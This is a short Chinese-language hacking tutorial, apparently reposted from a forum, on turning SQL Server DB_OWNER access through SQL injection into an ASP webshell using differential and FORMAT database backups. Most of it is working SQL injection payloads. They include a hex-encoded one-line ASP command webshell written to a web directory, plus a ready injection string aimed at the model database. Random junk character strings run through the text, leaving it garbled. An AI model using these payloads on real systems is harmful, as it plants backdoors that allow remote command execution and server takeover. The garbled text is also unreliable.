DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

7 z" m2 A; o! B( k) v减少备份文件大小，得到可执行的webshell成功率提高不少
. v- i4 ^% ^: J7 h) I, H一利用差异备份
. u! ^2 j- |# W% m  T加一个参数WITH DIFFERENTIAL
; X: c4 _. D  `  T
1
2
* f/ Z" @7 d+ b. d3
$ i( L. t/ P# m  P( f6 X8 E! R4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
! `( L# c$ C1 \1 e1 b  j9 k: m  iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" y: Y5 L5 g5 Q8 rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

4 A6 k6 B% J7 n6 K二利用完全FORMAT
加一个参数WITH FROMAT
  C8 o4 D8 u, p1 q  _0 D有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

: ^6 j& H. j( \0 W( m: ^) y/ d6 w1
2
, _- W0 H, n$ |$ ~. D4 E5 f3
4
8 q) W$ J' o, B6 N declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ c# I3 V. D4 `) Hcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" e/ Y# [- g+ E/ K: Rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

- L8 P& Y  k) M; x" F* Z4 J0 k总的来说就是那么简单几句,下面以备份数据库model为例子
8 k- ~4 n1 g2 x$ _3 i4 ~4 q1
  Q, k1 r# q9 j2 F4 M
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
# Q6 g; p. [; \
: W( E+ B* W& {" M: x* O" x$ {/ f2
( m( T  p, K  S4 U2 u; V, }
3 T; U6 F" V$ V4 y$ m1
id=1;backup database model to disk='你的路径‘ with differential,format;--